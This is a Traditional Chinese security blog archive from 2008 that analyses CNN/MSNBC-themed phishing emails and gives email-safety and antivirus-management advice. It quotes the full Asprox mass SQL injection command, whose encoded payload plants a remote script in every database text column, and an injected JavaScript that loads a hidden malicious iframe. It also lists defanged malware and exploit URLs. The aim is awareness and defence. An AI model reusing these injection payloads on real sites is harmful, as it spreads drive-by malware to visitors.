如果測試過程中，看到下面畫面就表示你失敗了，因為你執行了惡意程式囉！當然啦，這兩個網站是讓你測試的，它不是真的惡意程式。

這兩個測驗你通過了嗎？因為已經告訴你這是個測驗了，所以你已經有準備了，如果在夾在釣魚郵件中的網站連結，你能不被騙嗎？
基本上，對付釣魚郵件還是需要靠個人使用電子郵件的警覺性的，有時還是有可能不小心連線到釣魚網站，如果釣魚網站夾帶惡意攻擊碼，需要靠你的瀏覽環境去應付，可以到這來挑戰你的上網環境；如果使用的是單純騙術，哪就考驗你的智慧啦；但也可能結合兩者喔...

本文同步張貼於：阿碼外傳

「msnbc.com - BREAKING NEWS」釣魚郵件

2008-08-15T22:10:00.006+08:00

繼「CNN.com Daily Top 10」、「CNN Alerts: My Custom Alert」一系列釣魚郵件之後，詐騙份子又一精心策劃之作。

看看郵件長的樣吧！
主旨：msnbc.com - BREAKING NEWS: COP: FAMILY LIVING IN FEAR

主旨：msnbc.com - BREAKING NEWS: Star Trek star dies at age 79

發現有哪不同嗎？手法又進步了喔...有發現嗎？
主旨都不一樣喔！先前手法的主旨都是一個樣的。

看一下郵件標頭(Mail Header)好了...
主旨：msnbc.com - BREAKING NEWS: COP: FAMILY LIVING IN FEAR

主旨：msnbc.com - BREAKING NEWS: Star Trek star dies at age 79

如果不會看郵件標頭(Mail Header)的可以參考這網站，把郵件標頭複製貼上即可。哦...不知郵件標頭在哪呀...哪就參考這囉。

預計這種手法將會變成常態，Anti-Spam將會面臨這類釣魚郵件手法的嚴重考驗，你的Anti-Spam擋得住嗎？哪你的使用者又會辨別嗎？

本文同步張貼於：阿碼外傳

電子郵件警覺性之觀念

2008-08-09T23:45:00.007+08:00

這年頭啥都能詐騙，畢竟騙術才是歷史最悠久的惡意伎倆，因為，只要有人它就存在。唯一破解之道也只有靠個人警覺性及敏感度，但很重要的成分需要靠歷練，知道人家會怎騙你，這是最快的方法。
網際網路上的陷阱更多，無論是上網、線上遊戲、網路交易...都會有「社交工程術」的問題，今天只談電子郵件(E-Mail)的部分，如果沒有養成一套觀念，哪...Dances with malware, always.

有人會說不是有Anti-Spam(反垃圾郵件)系統來做郵件過濾了嗎？怎還會收到惡意郵件或釣魚郵件。也許大多數的人都沒有管理過Anti-Spam的經驗，當然也無法體會管理Anti-Spam的痛苦；Anti-Spam管得緊(嚴密)，也許真的收不到奇怪郵件，但也可能造成收不到正常郵件，管的鬆，也許不會誤擋郵件，但是卻會漏擋奇怪郵件；更痛苦的是，它的那一把尺是需要浮動的，如果哪把尺不動，有時會收不到正常郵件，有時又會收到奇怪郵件，怎做都是被使用者罵到臭頭。所以...一定會收到垃圾郵件，甚至惡意郵件，只是多少而已。
如果遭受的是「魚叉式郵件攻擊」，使用者真的得要有兩下真功夫才行，不然能靠防護設備"剛好"發現來阻擋。

使用電子郵件應有的警覺性觀念：
1.我為何會收到這封郵件？
2.我是不是應該收到這封郵件？
3.我是不是有必要開啟附件或點選連結？

我為何會收到這封郵件?
這是第一步，也是最容易的一步，強烈建議一定要徹底執行，也就是"誰寄信給我"、"寄件者是誰"；需要注意的是"寄件者名稱"是可以假造的，"寄件者郵件地址"也是可以假造的，所以大多垃圾郵件或釣魚郵件的寄件者資訊都是假的，而這些幾乎一定不是我認識的人。透過第一層過濾問題郵件通常是最快也是最有效的方式。
另外一個問題也需要特別注意，為何對方會有我的郵件信箱的地址？郵件地址外流的原因？當然啦！這原因有很多種可能，就像詐騙集團怎會有我的手機電話或個人資料一樣，這裡就不探討這麼多了。

我是不是應該收到這封郵件?
這個階段需要注意的是"郵件內容"，包含郵件主旨及信件內容，是不是跟我有關聯？內容是否合理？有沒有威脅利誘的字眼？有沒有詐騙的可能？...這幾個問題有沒有頭昏腦脹呢？光是內容是否合理...每個人看到的都不一樣，完全需要個人神聖的智慧。有時還需要眼力大考驗，對於相似字眼：1-l,0-O,C-G,w-vv,m-rn...等，相似字串、類似字意...等，這其中可以玩弄的手法實在多到不行。
如果有威脅利誘的內容，又跟$有關的郵件，哪就得更小心了，這幾乎也是詐騙慣用手法，別跟錢過不去唄！

我是不是必要的開啟附件或點選連結?
除非是"Melissa病毒"再世(這是郵件軟體的漏洞問題)，否則真正危害的動作是開啟附件或點選連結，是這兩個動作開始讓我的電腦被植入惡意程式，所以在這兩個動作上務必審慎之。就像是ATM把錢轉出去一樣，終極目標就是這個。對惡意程式研究者來說郵件中的附件與連結都是有趣的研究對象，有時值得再三玩味的哩。但是對一般使用者，可千萬不要輕易嘗試。

做好郵件信箱管理
1.現在有在上網的應該都不只一個信箱吧，在無法完全婉拒垃圾郵件下，善盡保護郵件信箱也是必要的，所以是不是應該考慮其中一個不常用的信箱來收垃圾郵件呢？這樣可以保護其他的信箱的。
很多網站會員或抽獎活動或五四三的...填寫個人資訊中E-Mail幾乎不可少，其他欄位都可以填假資料，郵件信箱當然留"專收垃圾郵件"的信箱囉！其他需要對外公開的信箱，也應該留此"專收垃圾郵件"的信箱。
2.另外兩個是親朋好友信箱及公司信箱，這樣區分好使用目的的信箱，可以讓郵件的警覺性更容易做。因為這樣做可以非常容易區分出有問題的郵件；公司信箱只會有同事及業務往來，親朋好友信箱當然是親朋好友的信件囉。否則，每天都要做複雜的考驗...會很痛苦。
3.一定要思考垃圾郵件的來源或成因，通常都是在外登錄或抽獎...等，留下的個人資料；並且要設法降低垃圾郵件數量，如果真的不行也只有更換郵件信箱一途了。

基本上，有心人士堅信一件事...「總有一天釣到你」
大家得思考一件事，如果有心人士一次寄出上萬封釣魚郵件，根據反網路釣魚小組(Anti-Phishing Working Group, APWG)的統計，大約會有5%的成功率，也就是說一萬封會有500人點選連結或開啟附件，這五百人多少總是會有人執行惡意程式的(很抱歉，我沒幹過所以我沒有成功機率的統計數據)，而有心人士會一直釣魚內容來誘惑你，慢慢的，有心人士能控制的機器就越來越多了。
如果，有心人士不以量取勝，一次花數小時卻只寄出一封郵件，且這封釣魚郵件確實是由你認識的人寄給你的，內容也煞有其事...這時，你能不受騙上當嗎？這就是「魚叉式郵件攻擊」。這類攻擊利用的手法及技巧將會更高明，甚至是更先進的技術，你會不咬這個餌嗎？
如果你的身分地位夠重要，你很可能就會收到這類「魚叉式郵件攻擊」郵件的。

餌再怎麼做，它還是一個餌
別忘了！餌的後頭都還會有一條線，只是發現這條線需要一些技術，在這我只能教大家去識別餌的樣，最後，要記得信箱裡的信除了垃圾郵件外，還非常可能有釣魚郵件的。

本文同步張貼於：阿碼外傳

CNN釣魚郵件內容改版啦

2008-08-08T16:24:00.005+08:00

寄件者：CNN Alerts [tid-sucila@rakcorrosioncontrol.com]
主旨：CNN Alerts: My Custom Alert
內容：
Alert Name: My Custom Alert

Ledger's joker withdrawn from Oscar race
Fri, 8 Aug 2008 11:19:24 +0300

FULL STORY
==================================

看到釣魚郵件的網站連結在哪了吧！看出它的手法了吧！
還有一點呼應前一版釣魚郵件的內容哩...顯然有一連串的計畫手法。這惡意連結連到哪呢？相信大家已經猜到了，沒錯，就是剛改版的釣魚網站，可以參考前一文章。

郵件內容也是相當火熱的連結，搭上今晚奧運開幕的熱門新聞，這也是釣魚郵件需要符合新聞潮流的必要條件，才會使多人容易受騙上當的，魚餌在"FULL STORY"的連結，其他連結都是正常的。這樣的釣魚郵件非常仿真，反垃圾郵件廠商要注意了，因為躲過反垃圾郵件過濾的機率相當高，大家小心...

"CNN.com Daily Top 10"釣魚郵件-釣魚網站進化版

2008-08-08T12:34:00.008+08:00

繼"結合多種手法的釣魚郵件"一文
原本的釣魚郵件內容已經相當精美了，你會分辨嗎？但之前的釣魚網站卻太遜了，只有CNN的一個小Logo。

這次"CNN.com Daily Top 10"的釣魚網站內容進化了，已經到近乎完美！
URL：hxxp://www.bellomeparrucchieri?.it/cnnnews.html

看出網站的陷阱嗎？
1.當然是URL(Domain)不正確，不是真正的CNN網站，但你又知道正確CNN網站的URL(Domain)嗎？
2."Adobe Flash Player"陷阱，你真的沒安裝嗎？還是安裝了它在誘騙你去安裝？
3.它讓你一定得看到"下載程式"的訊息，不然其他訊息一直跳出來，視窗又關不掉。這是絕招....

前一個畫面點選取消，會出現接下來的畫面，只有確定的選項可以選擇，點選"確定"後又回到前一畫面，逼你一定得選第一畫面的"確定"選項，這時瀏覽器視窗也無法直接關閉。頑強抵抗在這時是沒有用的。

所以一定得到下面訊息，才能關閉。夠狠吧！

你不會已經下載並且執行了吧...XD
這次網站並未夾帶惡意攻擊碼，相信還會在放上來的，大家小心了...

結合多種手法的釣魚郵件

2008-08-05T22:26:00.006+08:00

主旨：CNN.com Daily Top 10
哇！CNN服務真好，主動寄日報給我耶！要有國際觀先從這開始吧...
有沒有想過為啥CNN會主動寄郵件給你呢？你是不是應該收到呢？你應不應該開啟呢？
沒錯！這是釣魚郵件。它結合三大攻擊手法呢?
1.維俏維妙的釣魚郵件內容，可不像一般簡單的幾個字加上一個超連結(URL)，以後釣魚郵件的餌會越來越精美。
2.釣魚郵件內的連結(URL)連往詐騙網站(Phishing Website)，詐騙網站會給你看似正常的下載，如執行檔(.exe)...等。未來詐騙網站會越來越符合常理判斷，一不小心就...
3.詐騙網站(Phishing Website)還夾帶惡意攻擊碼，會攻擊瀏覽器漏洞，而且還會設法規避偵測。若是0-Day漏洞出現，只能願上帝保佑...

前面已經看過幾個詐騙案例，去分析郵件來源已經沒有太大意義了。瀏覽惡意連結的網站(hxxp://www.bardaue?.com.br/index2.html，注意瀏覽郵件連結是危險動作)，瀏覽畫面如下：看起來是不是很正常的呢？跟你說沒有播放軟體，還主動下載給你耶！餌都送到你嘴邊啦，就等你咬。

它的攻擊碼在這裡(hxxp://www.bardaue?.com.br/1.html)，隱藏的挺好的。還有好幾個規避偵測的技巧在其中。

有沒有好的工具可以分析一下相關連結呢？目前我知道的有四個，如果有人知道其他的網站有，小弟不吝賜教囉！

1.HackAlert:http://hackalert.armorize.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果：

檢測"hxxp://www.bardaue?.com.br/1.html"結果：

2.LinkScanner:http://linkscanner.explabs.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果：

檢測"hxxp://www.bardaue?.com.br/1.html"結果：

3.Dr.Web:http://online.us.drweb.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果：

檢測"hxxp://www.bardaue?.com.br/1.html"結果：

4.Finjan:http://www.finjan.com/
檢測"hxxp://www.bardaue?.com.br/index2.html"結果：

檢測"hxxp://www.bardaue?.com.br/1.html"結果：

以上看完，希望大家對詐騙郵件能有些警覺性。這還不是「魚叉式網路詐騙(Spear phishing)」的郵件喔！想知道啥是「魚叉式網路詐騙」可以參考這裡的微軟網站說明、還有中文維基，這類郵件更難識別一旦被鎖定，得要練就一身好功夫才行。

Mass SQL Injection + Phishing WebSite

2008-08-04T20:11:00.010+08:00

因為雲端的威脅，駭客集團註冊的網域(Domain)可以發揮的空間受到壓縮，所以得善盡利用網域，於是結合Phishing WebSite來進行詐騙。駭客集團可能還有秘技來因應雲端的威脅。

先來看看下面幾張圖：

眼力大考驗，看出哪裡不同嗎？哪裡又是一樣呢？在搞甚麼鬼呢？
1.URL(Domain)不同，分別為"porv.ru"、"ncbw.ru"、"po4c.ru"，這些網域都是Mass SQL Injection攻擊所植入惡意連結的網域。
2.其中"po4c.ru"已經被FireFox 3標示為"已知有害網站"。
3.三個網站內容都是一樣的，是一家銀行。google找一下"union bank"...真多，不知是真的Union Bank很多，還是有一堆是假的，所以用搜尋引擎找銀行是很危險的事。

來查查Domain註冊資料：
1.porv.ru...查詢結果
domain: PORV.RU
type: CORPORATE
nserver: ns2.porv.ru. 66.233.229.99
nserver: ns1.porv.ru. 79.184.20.160
nserver: ns3.porv.ru. 68.224.31.128
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
2.ncbw.ru...查詢結果
domain: NCBW.RU
type: CORPORATE
nserver: ns1.ncbw.ru. 75.58.125.164
nserver: ns3.ncbw.ru. 98.223.79.10
nserver: ns2.ncbw.ru. 67.81.36.254
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 7783322
e-mail: finkklsa@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.31
paid-till: 2009.07.31
source: TC-RIPN
3.po4c.ru...查詢結果
domain: PO4C.RU
type: CORPORATE
nserver: ns1.po4c.ru. 67.193.115.136
nserver: ns3.po4c.ru. 67.61.45.63
nserver: ns2.po4c.ru. 69.119.119.178
state: REGISTERED, DELEGATED
person: Private Person
phone: +7 495 1193323
e-mail: jest1s@yahoo.com
registrar: NAUNET-REG-RIPN
created: 2008.07.24
paid-till: 2009.07.24
source: TC-RIPN

今天是2008.08.04，網域申請日期也才沒幾天的事，上面註冊的資料也不會是真的，網域註冊是要付費的，查金流呢？查到的應該是線上刷卡的，通常也是盜刷的。等網域註冊商發現然後再取消該網域，應該也是幾天後的事了，那時駭客集團應該也在註冊另外一批網域了。
想知道還有哪些網域被註冊利用嗎?可以參考：
http://www.dynamoo.com/blog/labels/Asprox.html
http://www.shadowserver.org/wiki/uploads/Calendar/sql-inj-list.txt

再來看看hxxp://porv.ru/js.js：<有的防毒軟體會將下列程式碼視為惡意程式>
window.status="";
n=navigator.userLanguage.toUpperCase();
if((n!="ZH-CN")&&(n!="ZH-MO")&&(n!="ZH-HK")&&(n!="BN")&&(n!="GU")&&(n!="NE")&&(n!="PA")&&(n!="ID")&&(n!="EN-PH")&&(n!="UR")&&(n!="RU")&&(n!="KO")&&(n!="ZH-TW")&&(n!="ZH")&&(n!="HI")&&(n!="TH")&&(n!="VI")){
var cookieString = document.cookie;
var start = cookieString.indexOf("v1goo=");
if (start != -1){}else{
var expires = new Date();
expires.setTime(expires.getTime()+9*3600*1000);
document.cookie = "v1goo=update;expires="+expires.toGMTString();
try{
docurnent.vvrite("<\ifrarne src=hxxp://ncbw.ru/cgi-bin/index.cgi?ad width=0 height=0 frameborder=0><\/ifrarne>");
}
catch(e)
{
};
}}
其中的網域會一直變換的，駭客集團總是有用不完的網域，怪...。如果，網域有特定編碼產生，惡意程式反向連結時可以用動態編碼網域來連結，這可就屌了，現今所謂的「網站信譽評等」、「網站黑名單」機制就宣判死刑。你能想像這天嗎？我相信快了...

本文同步張貼於：阿碼外傳

Dances With Malware

2008-08-01T15:30:00.006+08:00

有些人已經習慣與惡意程式共存
很多人說，我的電腦沒有重要資料也不做重要的事，所以，不做網路金融交易、沒有個人機密資料、不放特別的圖片，只不過上上網、聊聊天、聽聽音樂、看看電子郵件、偶而打打怪...如此而已；電腦裡面有惡意程式，又有什麼關係。乍聽之下，也是沒錯的！
有的人努力對抗惡意程式的侵入，也"設法"安裝了許多防護程式，但，電腦中沒有惡意程式嗎？「我的電腦好像怪怪的」...這感覺猶如餘音繞樑，久久揮之不去啊！這也應該是不少人的心聲。
有的，心態上就已經大概完全妥協了。Overall Compromise...

駭客的心態
無論哪種攻擊手法或入侵方式，大多最終都會植入惡意程式，或讓更多人被植入惡意程式，這是一種模式。
能操弄的主機不嫌多，況且，有時一個攻擊手法出去，進來的肉雞一籮筐，也不見得有時間偷資料，重點是散播出去的惡意程式能躲多久？如何不被發現？接下來才會去想如何運用？

甚至，攻擊過於成功、範圍太大，反而容易被防毒軟體公司所查獲，這段期間必須不斷變種惡意程式，也就有了各種加殼的惡意程式。總是有漏網之魚躲過防毒軟體偵測，會是你的電腦嗎？
一般使用者的電腦:通常當跳板或濫發郵件使用，因為這些主機IP通常不固定，相當好用但缺點是它不會一直開機，如果是他國的電腦，哪...幾乎就可以不用管法律問題了。
企業用戶的電腦:這就會比較小心"使用"了，竊取資料大概是最常見的，如何進行下一步考驗駭客的能力，如何賺取金錢考驗駭客的行銷了，這時很容易變成一個集團造就地下經濟的發展。最先知道資訊外洩的，通常企業的客戶會先接到詐騙電話或簡訊。企業的客服單位有沒有足夠的敏感度呢？
更高層次的，是否有資訊商業間諜呢？這些可能是最黑暗的地下經濟吧！

使用電腦的正確觀念
1.作業系統的修正更新外，MS Offrice、應用程式(看圖、解壓縮、開啟pdf...等程式)，還有瀏覽器的Plug-In(Add-On)...等都要特別注意。
2.防毒軟體，不少人都在提防毒軟體無用論，我到是認為使用者不應去考驗防毒軟體，如果防毒軟體一天到晚都出現警訊，使用者一定要知道出現警訊的原因，檢討並修正你的習慣。這樣才是正確的使用防毒軟體。如果是一般家庭用戶，安裝免費防毒軟體即可，可以考慮AntiVir, AVAST 及 AVG。
3.上網安全，這也是目前使用者最大的威脅，建議經常瀏覽環境：FireFox3 + NoScript(Add-On)，FireFox3後面有google雲端加持，加上禁止非必要的Script執行，可以避免許多不必要的問題。如果想多了解或者想挑戰上網安全可以參考這裡。
4.郵件安全，切記點選郵件中的連結及開啟郵件中的附件是危險動作，小朋友千萬不要閉著眼睛學習喔！
5.P2P軟體使用千萬要小心，不正確的使用除了會把自己硬碟資料分享出去外，去外面抓回來的檔案也常是一堆問題，你有能力分辨嗎？尤其是一些破解程式，十個中有十一個都是有問題的，你知道嗎？
6.USB裝置，建議把USB裝置的自動執行關閉。USB惡意程式通常也相當難清除，這設定可以省些麻煩的。
7.社交工程手法，也就是詐騙的手法，這就不是能用說的就能講清楚的啦！多看些資訊安全新聞，多了解詐騙手法，看多了就知道了。
8.被植入惡意程式怎辦？很多人問的一個問題。我只能建議他們到這裡，挑一家線上掃毒試試吧。如果可能是間諜程式，可以到這裡。如果可以，每周挑一家做個健康檢查吧！但這樣的健檢無法確保成效，重點是使用者不應讓電腦出生入死的。
9.其他如個人防火牆、無線環境(加密)、密碼強化、即時通訊(IM)...等，這就不多說啦！

低調、詭譎與資安

2008-07-26T23:35:00.006+08:00

資安是很低調的：
進行資安防禦策略與運行，都要很低調，畢竟讓人家知道你用哪一種防毒軟體就是一個漏洞，其他資安策略與防護當然也是。所以很多人都說資安要很低調的做...漂亮！
出了事，可能網站被竄改、主機被入侵、資料外洩...很常見的資安事件，但都一定是冷處理，低調處理到主管、管理階層都完全不知道...有夠低調，低調到不行；哪你還期望企業能對資安做何管理呢？抱怨企業不重資安嗎？管理階層會主動關切嗎？...一切都走樣了對吧！
網站被竄改→哪就把竄改的做復原，主機被入侵→把惡意程式移除，資料外洩→哪就給它加密，還是DLP一下的；幾乎都是這樣處理的吧，是阿...表面上都沒問題了。但...真正的問題才開始呢？
網站被竄改→竄改原因？漏洞管道？→是否還有其他相同問題？→如何補救？如何防護？...
主機被入侵→如何發現(這很重要的)？入侵原因？入侵管道？→是否還有其他主機也被入侵？→如何查？哪裡有線索？...
資料外洩→這問題就更複雜了，沒有前面處理經驗，這題無解→無解就亂解，給它加密還是DLP一下的...
未來挑戰只會更大...

資安是很詭譎的：
外在威脅是很詭譎多變的，這是一定的，畢竟要攻其不備；有人說也造就了資安產業，講這句話的通常都是出問題才找解決方案的，講這句話的通常也是把資安產業當流行產業的，跟著流行走的人往往也是不知自己的風格與品味。
內部的威脅也是很詭譎的，每個人都說資安等同不方便，不方便卻變窒礙難行，打著資安名義進行各種所謂控管，但也不知有沒有效或管到重點。就像台灣交通，未了所謂交通安全訂出不少交通法令與規則吧！！但你我都知道，不管開車、騎車、腳踏車還是行人，根本不能完全遵守交通規則。如果是為了所謂安全，哪應要動搖國本也應該先把路面給搞平吧，20年了路也還沒平，現在連路燈都快沒了，怎會有安全呢？

我想，資安觀念與管理需要不斷成長的，技術的獲取及成長或許很容易，但觀念與管理卻沒有跟上，沒有觀念與管理配合的技術，結果大家應該很清楚。所以企業內部需要不斷討論、研究與分析，彙集內部能量然後進行測試、實作與調校，來達成預期的目的，這是很重要的。
每年全球各地都有駭客年會，其實，我一直覺得也應該有"甲方資安年會"，透過經驗交流與資訊分享方式，是最快也最省資源的方式。

Milestone : Mass SQL Injection

2008-07-23T20:47:00.013+08:00

Mass SQL Injection先看幾則新聞...
iThome:SQL Injection機器人來襲
ZDNet Taiwan:大規模攻擊事件主因：駭客工具結合Google Hacking
armorize：新型態的Mass SQL Injection在台上演

這是一個里程碑，顛覆一般人對SQL Injection(資料隱碼)攻擊的觀感，以前總以為此攻擊需要人來進行，且要不斷刺探資料庫，取得資料庫欄位...等資訊，再進行資料庫的操弄，所以...也顛覆我的觀念...這就是資安！

SQL Injection問題存在已久，2000年時就不斷聽到這問題，但...這問題存在更久...打從有網站開始就有了...XD
更糟的是...現在還有一堆網站開發人員還不知這是啥...XD
就算知道的...也沒把問題解決，做單引號規避、把資料庫錯誤訊息關閉...等，今天，完完全全的被擊潰，只要一槍(一串指令)，網頁內容就遭植入惡意連結，只要有SQL Injection問題的網站、對資料庫有寫入權限...就能搞定。

這串指令，將成為經典：
;dec1are [a]t varchar(255),[a]c varchar(255) dec1are tab1e_cursor cursor for se1ect a.name,b.name from sysobjects a,sysco1umns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) open tab1e_cursor fetch next from tab1e_cursor into [a]t,[a]c whi1e([a][a]fetch_status=0) begin exec('update ['+[a]t+'] set ['+[a]c+']=rtrim(convert(varchar,'+[a]c+']))+cast
(0x223E3C74697431653E3C2F73637269706420737263
3D687474703A2F2F7878782E7878782F782E6A733E3C7
363726970643E3C212D2D as varchar(67))') fetch next from tab1e_cursor into [a]t,[a]c end c1ose tab1e_cursor dea11ocate tab1e_cursor;--

現在...攻擊還是在進行式中，如果大家想勘災，可以用google搜尋字串"ngg.js"...這已經有五十萬筆資料了...夯吧！想知道有哪些惡意連結的網域可以參考這裡，上面連結中的網域也可以拿來當google的搜尋字串，希望大家勘災之餘不會見到自己熟悉的網址...XD

這一槍應該可以喚醒大家對程式開發的重視，但網站還不只有SQL Injection問題，只要問題一直存在，就會有被徹底擊潰的一天。

企業防毒管理

2008-07-19T21:28:00.005+08:00

先看幾則新聞：
http://www.itis.tw/node/1913
http://www.zdnet.com.tw/news/software/0,2000085678,20130359,00.htm
http://forum.icst.org.tw/phpBB2/viewtopic.php?p=49359
=>趨勢CEO陳怡樺：防毒產業騙了客戶20年

這內容相當詭譎~~
有很多深層意義
1.防毒原廠不了解自己的產品。
2.客戶端沒了解也沒善用防毒軟體。
3.許多防毒觀念嚴重扭曲中，完全都在各自表述。
4.一竿子打翻所有防毒產業。
5.防毒產業還在業務導向，而不是服務導向也不是技術導向。

二十年了，惡意程式也經過不斷變形與攻擊形式轉換，反惡意程式這幾年有許多新興產品，反病毒(Anti-Virus)、反間諜、反廣告、強化反病毒(強調與防毒軟體互補的)...等軟體，多到不行的用戶端產品；我想每套軟體都有其優點，但也都有誇大功效之嫌，如何挑選，客戶根本沒有能力了！所以現今需要的了解攻擊趨勢及惡意程式來源管道，做重點強化防禦。如果只是希望買個軟體就能解決問題...結果已經很明顯了。

企業的防毒管理觀念：
1.多層次、多配套策略來建構防線，而用戶端防毒是最後一道防線。
2.每道防線都需要產出數據化資訊。
3.強化所有防線或策略，需要以最後一道防線數據來觀察其成效。
4.觀察每道防線的數據，注意其變化。
5.有專人檢視每份數據，並進行調整及強化作業。
6.如果沒有好的最後一道防線，將無法發掘真正問題點。

企業防毒中控端的需要功能(強調中控端就可以做，不是要在用戶端進行的)：
1.查殺惡意程式可自救。
2.分析用戶端系統的工具或記錄不可少。
3.有客製化的服務功能(依據客戶有量身訂做的特定服務功能)。
4.報表數據要能符合需要，並能呈現現況。
5.有惡意程式分析(SandBox)功能。
6.能夠整合其他防禦設備進行協同防護，如與防火牆、入侵偵測、入侵防護...等設備，進行封鎖或阻擋行動。
7....

我對企業防毒中控端功能的期望：
1.有所有用戶端處於執行中檔案的MD5,SHA-1...等資訊，能第一時間查殺，而不需要等原廠製作病毒碼。
2.能主動查詢用戶端的網路連線、執行程序狀態...等，並可進行檢查或統計分析工作。
3.對於重要主機可以做執行程序、自動啟動(Auto-Start)途徑變更的比對功能，或其變化的紀錄。
4.透過中控端可遠端取得用戶端執行中之檔案複本，進行分析、檢測之用，檢測是否為"未知"惡意程式。
5.各種客製化的門檻或條件設定，做為警示或提醒作用。
6.各種客製化的數據及報表的產出設定，做為分析之用。
7.有惡意程式分析功能，找出特定網路行為，找出其他可能被相同駭客集團控制的主機。
8....

企業防毒對於"未知"病毒的發掘必須有工具或方法使用，現行遇到"未知"病毒所有客戶只能兩手一攤，防毒廠商也兩手一攤，然後呢？
使用者端PC都已經安裝一套軟體了，居然沒有一些工具或方法，透過企業的防毒中控端進行，這不是挺怪的...創意，這需要一些創意的。在這只點出一些方向...

一封詐騙的電子郵件

2008-07-18T12:32:00.013+08:00

今天一早收到一封郵件：

看起來平淡無奇，檢查超連結也沒有異常，不過就是一封垃圾郵件吧！

開啟連結畫面(危險動作：點選郵件連結及開啟郵件附件都是危險動作)：

懂些電腦的，應該可以看出異常處，但一般人呢？

不攻擊漏洞，純粹用點混淆、欺瞞手法才是攻擊最高招~~
就像魔術一樣，不懂魔術手法的人，只能看好戲~~XD

我當然不能這樣就放過它，要給它剖析一下...
先看一下郵件標題(Header)：
Microsoft Mail Internet Headers Version 2.0
Received: from 200.net88.skekraft.net ([213.199.88.200]) by my.mailserver.com with Microsoft SMTPSVC(x.x.xx.xx);
Fri, 18 Jul 2008 10:26:23 +0800
MIME-version: 1.0
Content-type: multipart/alternative;
boundary="Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)"
Message-id: <1F012145-4DF2-0768-4915-28014035C24A@tweet-garot.com>
From: Halchakar
To: support@mailserver.com
Subject: Alligator attack savages 3 students on school trip
Date: Fri, 18 Jul 2008 04:26:25 +0200
X-Mailer: Apple Mail (2.924)
Return-Path: tmmatsre@tweet-garot.com
X-OriginalArrivalTime: 18 Jul 2008 02:26:24.0077 (UTC) FILETIME=[AC62C7D0:01C8E87D]

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/plain; charset=UTF-8; format=flowed
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)
Content-type: text/html; charset=UTF-8
Content-transfer-encoding: 7BIT

--Boundary_(ID_xslUrQTXLNHhh8epXfAVQH)--

寄件信箱-tmmatsre@tweet-garot.com，信箱網域確實存在但沒該帳號信箱，通常寄件者幾乎都是假的。
Hostname mail.tweet-garot.com
MX Priority 10
Results 220 barracuda.tweet-garot.com ESMTP d5a48418eea1c05ff8ac9d4ec4eca22e
Hostname backup-mx.choiceone.net
MX Priority 20
Results 220 bmx002.onecommunications.net ESMTP
寄件IP-213.199.88.200，在瑞典。
City Skellefteå
State/Region 23
Zipcode
Area Code 0
Country SE
Latitude 64.7667
Longitude 20.95

再來看看連結的網站：
schnittstellentechnik.de--解析IP->62.67.235.170
Domain: schnittstellentechnik.de
Nserver: ns1.evanzo.com
Nserver: ns2.evanzo.com
Changed: 2006-12-20T23:34:05+01:00

IP定址：
62.67.235.170@Germany
應該是Web Hosting上面的一個網站

惡意程式：
hxxp://schnittstellentechnik.de/watch.exe

VirusTotal：檢測結果
Result: 13/33 (39.4%)

該網站還夾帶一個攻擊碼，會攻擊IE瀏覽器漏洞，且攻擊碼有經過編碼的：
hxxp://schnittstellentechnik.de/00.html

#社交工程手法絕對是資安管理上的最大風險及弱點。
#Domains及Web Hosting已經被濫用了，這兩個管道能被杜絕，網路威脅將會大減。

就單一資安科技而言，無法達成"絕對"的資訊安全

2008-07-16T21:31:00.004+08:00

架設防火牆就能防火！。？
買了防毒軟體就百毒不侵！。？
有了入侵偵測防護(IPS,IDP)就駭客止步！。？
這都己經算是市場成熟的技術，但擁有該技術後，不少單位反而頭大...
今年又在炒DLP(Data Loss Prevention)，明年資料外洩只會更嚴重。

問題在哪？
沒有對症下藥的技術，當然沒解決問題。
沒有資安人才的技術，當然造成更多問題。
沒有有效管理的技術，當然有處理不完的問題。

更何況一窩蜂的科技，怎會是可以達到資訊安全的手段呢？
資訊安全產業不是流行產業啊...XD
(一窩蜂的科技，通常也是宣判已死的科技)

所以我的看法：
1.當別人都有的科技，你也不需要擁有，要就要早一步先採用。
2.要做科技的客製化功夫，跟別人不一樣通常也多一分安全。
3.善用科技做管理，在正確的地方徹底發揮其功能，進而挖掘別人看不到的優點。
4.有強項就有不足地方，需要其他科技補不足。
5.要最穩的新科技，而不是最強的。
6.建立一個防禦體系，做量化的報表產出。

日後想到再補囉！

要做好資訊安全，人才是最重要的一環

2008-07-15T20:02:00.006+08:00

資料來源：
http://www.us-cert.gov/ITSecurityEBK/
http://www.us-cert.gov/ITSecurityEBK/EBK2007.pdf
這份相關資訊安全人員的角色及應有功能與職責，算是區分的很詳細，可以參考的...

經營管理階層：
Chief Information Officer(資訊長)
Information Security Officer/Chief Security Officer(安全長)
IT Security Compliance Professional(法務稽核)
功能執行階層：
Digital Forensics Professional(數位鑑識專業人員)
IT Security Engineer(資安工程師)
IT Systems Operations/Maintenance Professional(操作維護專業人員)
IT Security Professional(資安專業人員)
基本必須階層(Corollary)：
Physical Security Professional(保全專業人員)
Privacy Professional(隱私權專業人員)
Procurement Professional(採購專業人員)

#看到昏頭沒...XD
經營管理階層的工作真不少耶...但似乎都丟給功能執行階層在做管理及規劃...對吧！快拿回去給上頭看看吧！
這對應表還包含實體保全及採購人員...範圍夠大吧...會不會發現公司只有這兩個角色在做資安...XD。
功能執行階層的角色不少的，大部分公司或單位應該只有操作維護專業人員吧。注意，管防火牆及防毒軟體不等同是資安工程師或專業人員喔。
在功能執行階層部分，我覺得最重要的資訊安全領域：
操作維護、網路管理、系統管理、風險控管、應變處理、數位鑑識。其中數位鑑識比較建議採外聘方式(與外包不同喔)。
